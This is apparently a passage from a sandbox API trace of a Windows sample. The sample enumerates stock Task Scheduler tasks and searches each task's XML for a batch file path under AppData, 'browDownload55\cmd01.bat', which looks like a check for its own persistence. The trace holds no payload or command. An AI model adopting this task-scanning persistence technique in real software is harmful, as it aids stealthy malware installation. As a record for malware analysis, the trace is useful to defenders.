true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n {613FBA38-A3DF-4AB8-9674-5604984A299A}\r\n \r\n \r\n \r\n") returned 0x0 [0163.161] StrStrIW (lpFirst="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319 64 Critical\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n {613FBA38-A3DF-4AB8-9674-5604984A299A}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.161] IUnknown:Release (This=0x929720) returned 0x0 [0163.161] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.161] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*=".NET Framework NGEN v4.0.30319 Critical") returned 0x0 [0163.161] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319 Critical\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n {DE434264-8FE9-4C0B-A83B-89EBEEBFF78E}\r\n \r\n \r\n \r\n") returned 0x0 [0163.161] StrStrIW (lpFirst="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319 Critical\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n {DE434264-8FE9-4C0B-A83B-89EBEEBFF78E}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.162] IUnknown:Release (This=0x929720) returned 0x0 [0163.162] IUnknown:Release (This=0x929590) returned 0x0 [0163.162] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.162] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.162] IUnknown:Release (This=0x929590) returned 0x0 [0163.162] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.162] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.163] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295e0) returned 0x0 [0163.163] IRegisteredTaskCollection:get_Count (in: This=0x9295e0, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.163] IRegisteredTaskCollection:get_Item (in: This=0x9295e0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9297b0) returned 0x0 [0163.164] IRegisteredTask:get_Name (in: This=0x9297b0, pName=0xce058 | out: pName=0xce058*="AD RMS Rights Policy Template Management (Automated)") returned 0x0 [0163.164] IRegisteredTask:get_Xml (in: This=0x9297b0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6002)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)\r\n \r\n \r\n \r\n S-1-1-0\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT1H\r\n Parallel\r\n true\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n PT1H\r\n \r\n 1\r\n \r\n \r\n \r\n PT1H\r\n \r\n \r\n \r\n \r\n {CF2CF428-325B-48D3-8CA8-7633E36E5A32}\r\n \r\n \r\n") returned 0x0 [0163.166] StrStrIW (lpFirst="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6002)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)\r\n \r\n \r\n \r\n S-1-1-0\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT1H\r\n Parallel\r\n true\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n PT1H\r\n \r\n 1\r\n \r\n \r\n \r\n PT1H\r\n \r\n \r\n \r\n \r\n {CF2CF428-325B-48D3-8CA8-7633E36E5A32}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.166] IUnknown:Release (This=0x9297b0) returned 0x0 [0163.166] IRegisteredTaskCollection:get_Item (in: This=0x9295e0, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9297b0) returned 0x0 [0163.166] IRegisteredTask:get_Name (in: This=0x9297b0, pName=0xce058 | out: pName=0xce058*="AD RMS Rights Policy Template Management (Manual)") returned 0x0 [0163.166] IRegisteredTask:get_Xml (in: This=0x9297b0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6003)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)\r\n \r\n \r\n \r\n S-1-1-0\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT1H\r\n Parallel\r\n true\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n {BF5CB148-7C77-4D8A-A53E-D81C70CF743C}\r\n \r\n \r\n") returned 0x0 [0163.169] StrStrIW (lpFirst="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6003)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)\r\n \r\n \r\n \r\n S-1-1-0\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT1H\r\n Parallel\r\n true\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n {BF5CB148-7C77-4D8A-A53E-D81C70CF743C}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.169] IUnknown:Release (This=0x9297b0) returned 0x0 [0163.170] IUnknown:Release (This=0x9295e0) returned 0x0 [0163.170] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295e0) returned 0x0 [0163.172] ITaskFolderCollection:get_Count (in: This=0x9295e0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.172] IUnknown:Release (This=0x9295e0) returned 0x0 [0163.172] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.173] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.173] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.179] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=4) returned 0x0 [0163.179] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.179] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="EDP Policy Manager") returned 0x0 [0163.179] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2015-02-09T10:54:13.9629482\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2978287140-3787137133-1749738600-1988163579-2060695581)\r\n $(@%SystemRoot%\\system32\\ApplockerCsp.dll,-101)\r\n $(@%SystemRoot%\\system32\\ApplockerCsp.dll,-100)\r\n $(@%SystemRoot%\\system32\\ApplockerCsp.dll,-102)\r\n \\Microsoft\\Windows\\AppID\\EDP Policy Manager\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7588BCA328009213\r\n \r\n \r\n 75E0BCA328009213\r\n \r\n \r\n \r\n \r\n {DECA92E0-AF85-439E-9204-86679978DA08}\r\n \r\n \r\n \r\n") returned 0x0 [0163.181] StrStrIW (lpFirst="\r\n\r\n \r\n 2015-02-09T10:54:13.9629482\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2978287140-3787137133-1749738600-1988163579-2060695581)\r\n $(@%SystemRoot%\\system32\\ApplockerCsp.dll,-101)\r\n $(@%SystemRoot%\\system32\\ApplockerCsp.dll,-100)\r\n $(@%SystemRoot%\\system32\\ApplockerCsp.dll,-102)\r\n \\Microsoft\\Windows\\AppID\\EDP Policy Manager\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7588BCA328009213\r\n \r\n \r\n 75E0BCA328009213\r\n \r\n \r\n \r\n \r\n {DECA92E0-AF85-439E-9204-86679978DA08}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.181] IUnknown:Release (This=0x929700) returned 0x0 [0163.181] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.182] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="PolicyConverter") returned 0x0 [0163.182] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-300)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-301)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-302)\r\n \\Microsoft\\Windows\\AppID\\PolicyConverter\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidpolicyconverter.exe\r\n \r\n \r\n") returned 0x0 [0163.184] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-300)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-301)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-302)\r\n \\Microsoft\\Windows\\AppID\\PolicyConverter\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidpolicyconverter.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.184] IUnknown:Release (This=0x929700) returned 0x0 [0163.184] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.184] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="SmartScreenSpecific") returned 0x0 [0163.184] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;AU)\r\n $(@%systemroot%\\system32\\apprepsync.dll,-701)\r\n $(@%systemroot%\\system32\\apprepsync.dll,-700)\r\n $(@%systemroot%\\system32\\apprepsync.dll,-702)\r\n \\Microsoft\\Windows\\AppID\\SmartScreenSpecific\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n Parallel\r\n true\r\n true\r\n \r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n PT30M\r\n \r\n \r\n \r\n \r\n {9F2B0085-9218-42A1-88B0-9F0E65851666}\r\n \r\n \r\n \r\n") returned 0x0 [0163.187] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;AU)\r\n $(@%systemroot%\\system32\\apprepsync.dll,-701)\r\n $(@%systemroot%\\system32\\apprepsync.dll,-700)\r\n $(@%systemroot%\\system32\\apprepsync.dll,-702)\r\n \\Microsoft\\Windows\\AppID\\SmartScreenSpecific\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n Parallel\r\n true\r\n true\r\n \r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n PT30M\r\n \r\n \r\n \r\n \r\n {9F2B0085-9218-42A1-88B0-9F0E65851666}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.187] IUnknown:Release (This=0x929700) returned 0x0 [0163.187] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.187] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="VerifiedPublisherCertStoreCheck") returned 0x0 [0163.187] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-200)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-201)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-202)\r\n \\Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n Queue\r\n 10\r\n true\r\n true\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n true\r\n \r\n \r\n \r\n PT30M\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidcertstorecheck.exe\r\n \r\n \r\n") returned 0x0 [0163.192] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-200)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-201)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-202)\r\n \\Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n Queue\r\n 10\r\n true\r\n true\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n true\r\n \r\n \r\n \r\n PT30M\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidcertstorecheck.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.192] IUnknown:Release (This=0x929700) returned 0x0 [0163.192] IUnknown:Release (This=0x929580) returned 0x0 [0163.192] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.195] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.195] IUnknown:Release (This=0x929580) returned 0x0 [0163.195] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.195] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.196] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295a0) returned 0x0 [0163.199] IRegisteredTaskCollection:get_Count (in: This=0x9295a0, pCount=0xce048 | out: pCount=0xce048*=3) returned 0x0 [0163.200] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.200] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="Microsoft Compatibility Appraiser") returned 0x0 [0163.200] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\appraiser.dll,-500)\r\n $(@%SystemRoot%\\system32\\appraiser.dll,-501)\r\n $(@%SystemRoot%\\system32\\appraiser.dll,-502)\r\n \\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n P4D\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2008-09-01T03:00:00\r\n \r\n P1D\r\n \r\n PT2H\r\n \r\n \r\n 750CBCA3290B9641\r\n 01\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\compattelrunner.exe\r\n \r\n \r\n") returned 0x0 [0163.204] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\appraiser.dll,-500)\r\n $(@%SystemRoot%\\system32\\appraiser.dll,-501)\r\n $(@%SystemRoot%\\system32\\appraiser.dll,-502)\r\n \\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n P4D\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2008-09-01T03:00:00\r\n \r\n P1D\r\n \r\n PT2H\r\n \r\n \r\n 750CBCA3290B9641\r\n 01\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\compattelrunner.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.204] IUnknown:Release (This=0x929740) returned 0x0 [0163.204] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.205] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="ProgramDataUpdater") returned 0x0 [0163.205] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\invagent.dll,-701)\r\n $(@%SystemRoot%\\system32\\invagent.dll,-701)\r\n $(@%SystemRoot%\\system32\\invagent.dll,-702)\r\n \\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n 4\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P1DT12H\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\compattelrunner.exe\r\n -maintenance\r\n \r\n \r\n") returned 0x0 [0163.208] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\invagent.dll,-701)\r\n $(@%SystemRoot%\\system32\\invagent.dll,-701)\r\n $(@%SystemRoot%\\system32\\invagent.dll,-702)\r\n \\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n 4\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P1DT12H\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\compattelrunner.exe\r\n -maintenance\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.208] IUnknown:Release (This=0x929740) returned 0x0 [0163.208] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.208] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="StartupAppTask") returned 0x0 [0163.208] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;LA)(A;OICI;FA;;;SY)(A;OICI;FRFX;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\Startupscan.dll,-701)\r\n $(@%SystemRoot%\\system32\\Startupscan.dll,-701)\r\n $(@%SystemRoot%\\system32\\Startupscan.dll,-702)\r\n \\Microsoft\\Windows\\Application Experience\\StartupAppTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n Parallel\r\n 4\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P2D\r\n P3D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n Startupscan.dll,SusRunTask\r\n \r\n \r\n") returned 0x0 [0163.211] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;LA)(A;OICI;FA;;;SY)(A;OICI;FRFX;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\Startupscan.dll,-701)\r\n $(@%SystemRoot%\\system32\\Startupscan.dll,-701)\r\n $(@%SystemRoot%\\system32\\Startupscan.dll,-702)\r\n \\Microsoft\\Windows\\Application Experience\\StartupAppTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n Parallel\r\n 4\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P2D\r\n P3D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n Startupscan.dll,SusRunTask\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.212] IUnknown:Release (This=0x929740) returned 0x0 [0163.212] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.212] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295a0) returned 0x0 [0163.215] ITaskFolderCollection:get_Count (in: This=0x9295a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.215] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.215] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.215] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.215] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.219] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.219] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.219] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="CleanupTemporaryState") returned 0x0 [0163.219] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FRFX;;;BA)(A;;FA;;;SY)\r\n $(@%systemroot%\\system32\\Windows.Storage.ApplicationData.dll,-5001)\r\n $(@%systemroot%\\system32\\Windows.Storage.ApplicationData.dll,-5002)\r\n $(@%systemroot%\\system32\\Windows.Storage.ApplicationData.dll,-5003)\r\n \\Microsoft\\Windows\\ApplicationData\\CleanupTemporaryState\r\n \r\n \r\n \r\n 